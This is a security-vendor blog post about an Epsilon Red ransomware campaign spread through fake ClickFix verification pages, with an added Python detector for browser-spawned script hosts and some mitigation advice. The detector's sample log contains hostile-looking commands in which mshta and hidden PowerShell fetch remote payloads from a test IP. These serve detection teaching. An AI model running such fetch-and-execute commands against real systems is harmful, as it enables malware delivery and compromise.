
Following closely after the Interlock ransomware attacks that used a new custom RAT delivered through a modified ClickFix variant called FileFix, a new malicious campaign has emerged, also leveraging a ClickFix-themed malware delivery website. Defenders have uncovered a novel global Epsilon Red ransomware operation that began in July 2025, in which attackers use fake ClickFix verification pages and impersonate multiple popular platforms to deceive users. The campaign relies on social engineering tactics to prompt victims to execute malicious HTA files via ActiveX, triggering covert payload delivery and ransomware execution.
Epsilon Red Ransomware Attacks Detection
In Q1 2025, Check Point observed a 126% surge in ransomware attacks, with the average daily incident count reaching 275—a 47% increase year-over-year. Insights from Symantec’s The State of Ransomware 2025 report highlight several operational vulnerabilities that leave organizations exposed. The most frequently cited issue was a lack of in-house expertise, identified by 40.2% of affected organizations. Close behind, unidentified security gaps were responsible in 40.1% of cases. Rounding out the top three was insufficient personnel or capacity, contributing to 39.4% of successful attacks.
While novel ransomware strains continue to emerge and threat actors adopt new delivery techniques, such as the ClickFix method used with Epsilon Red, cyber defenders must rely on timely, high-quality detection content and advanced cybersecurity tools to keep pace with the rapidly evolving threat landscape.
Register for the SOC Prime Platform to detect potential threats, like Epsilon Red ransomware, at the earliest possible stage. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button below to access a curated stack of detection rules designed to identify and respond to Epsilon Red ransomware activity.
All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
Additionally, security experts might streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, security professionals can use CloudSEK’s TRIAD team research to generate an Attack Flow diagram in a few clicks.
Epsilon Red Ransomware Attack Analysis
In May 2021, Sophos researchers identified a new ransomware variant dubbed Epsilon Red while examining an incident involving a U.S.-based hospitality company. Developed in Go and compiled as a 64-bit Windows binary, the malware focused solely on file encryption, delegating all other attack tasks—such as system preparation and execution—to more than a dozen PowerShell scripts. Despite their relatively simple obfuscation, these scripts successfully evaded detection by most mainstream antivirus solutions. The ransom note bears notable stylistic and grammatical similarities to those used by the REvil group, hinting at a potential link, though the malware’s techniques and operational infrastructure are otherwise unique.
CloudSEK's TRIAD team has recently discovered a ClickFix-style malware distribution site tied to the Epsilon Red ransomware, which was still under active development. Unlike earlier variants that relied on clipboard-based payload execution, this campaign directs users to a secondary page where malicious shell commands are executed stealthily via ActiveX, allowing payloads to be downloaded and run from attacker-controlled IP addresses. The campaign uses deceptive tactics like fake verification prompts to appear legitimate. Further infrastructure analysis revealed spoofed services including Discord Captcha Bot, Kick, Twitch, and OnlyFans, along with romance-themed social engineering lures.
The campaign poses significant risks, starting with endpoint compromise through web browsers. By exploiting the ActiveXObject interface, attackers can execute malicious code remotely during a user’s browser session, effectively bypassing standard download defenses. This technique paves the way for deeper system infiltration, including lateral movement and eventual ransomware deployment.
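The execution chain described above (a browser session handing off to an HTA or script host that pulls a payload from an attacker-controlled IP) leaves a recognizable trace in process-creation telemetry. The script below is an added illustration of that detection logic; it is not code from the original post, from CloudSEK, or from SOC Prime. The field layout, the sample events, and the 203.0.113.10 address are all constructed for the example and are not indicators from the campaign.

```python
"""Heuristic detection for ClickFix-style script-host execution chains.

Added example, not from the original post or the researchers it cites.
It flags process-creation events where a browser spawns a script host
(mshta, wscript, cscript, powershell, cmd) or where such a host is
launched with a remote URL, UNC path, or raw IP on its command line.
"""
import re
from dataclasses import dataclass

# Script hosts that a browser process has no routine reason to spawn directly.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
# Remote content fetched over HTTP(S) or via a UNC path to a raw IP address.
REMOTE_RE = re.compile(r"https?://\S+|\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.IGNORECASE)
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed sample events in a key=value|key=value layout mirroring the
# Image / ParentImage / CommandLine fields of Sysmon Event ID 1.
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real indicator.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe|CommandLine=mshta.exe http://203.0.113.10/verify.hta
Image=C:\Windows\System32\wscript.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=wscript.exe C:\Users\alice\login.vbs
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|CommandLine=powershell.exe -w hidden -c iwr http://203.0.113.10/stage.ps1
Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Users\alice\Downloads\report.hta
"""


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse the constructed key=value|... log format into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = {}
        for chunk in line.split("|"):
            key, _, value = chunk.partition("=")  # CommandLine may itself contain '='
            fields[key.strip()] = value
        events.append(ProcEvent(fields.get("Image", ""),
                                fields.get("ParentImage", ""),
                                fields.get("CommandLine", "")))
    return events


def score_event(ev: ProcEvent) -> list:
    """Return the list of reasons an event looks like a ClickFix-style launch."""
    reasons = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img not in SCRIPT_HOSTS:
        return reasons
    if parent in BROWSERS:
        reasons.append(f"script host {img} spawned by browser {parent}")
    if REMOTE_RE.search(ev.command_line):
        reasons.append("script host command line references remote content (URL/UNC)")
    if IP_RE.search(ev.command_line):
        reasons.append("script host command line references a raw IP address")
    return reasons


def detect(text: str) -> list:
    """Run the heuristics over a log and return one hit per suspicious event."""
    hits = []
    for index, ev in enumerate(parse_events(text), start=1):
        reasons = score_event(ev)
        if reasons:
            hits.append({"line": index,
                         "image": basename(ev.image),
                         "severity": "high" if len(reasons) >= 2 else "medium",
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"event {hit['line']} [{hit['severity']}] {hit['image']}: "
              + "; ".join(hit["reasons"]))
```

Run against the constructed log, events 1 and 3 are reported as high severity (browser parent plus a remote URL to a raw IP), while the locally launched wscript and mshta events are left alone. In production the same three checks map naturally onto a SIEM query over Sysmon or EDR process-creation events, with the browser and script-host lists tuned to the fleet's actual software.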
Compounding the threat, attackers employ brand impersonation by mimicking familiar services, like Discord CAPTCHA and popular streaming platforms, to lower user suspicion and increase the effectiveness of social engineering. The recurring use of themed malware delivery sites, such as ClickFix clones and romance-related lures, highlights a deliberate strategy and sustained infrastructure, suggesting a well-planned and ongoing threat operation.
As potential Epsilon Red ransomware mitigation measures, organizations should disable legacy scripting interfaces such as ActiveX and Windows Script Host using Group Policies across all systems. Integrating real-time threat intelligence feeds is critical to block known attacker-controlled IPs, domains, and IOCs linked to ClickFix-related operations. In addition, regular security awareness training should simulate impersonation scenarios involving popular platforms like Discord and Twitch to prepare users to recognize and avoid fake verification pages and social engineering lures. To stay ahead of ransomware attacks and other emerging threats of any scale and sophistication, organizations can leverage SOC Prime's complete product suite backed by AI, automation, and real-time CTI while strengthening their defenses at scale.
The post Epsilon Red Ransomware Detection: New Adversary Campaign Targeting Users Globally via ClickFix appeared first on SOC Prime.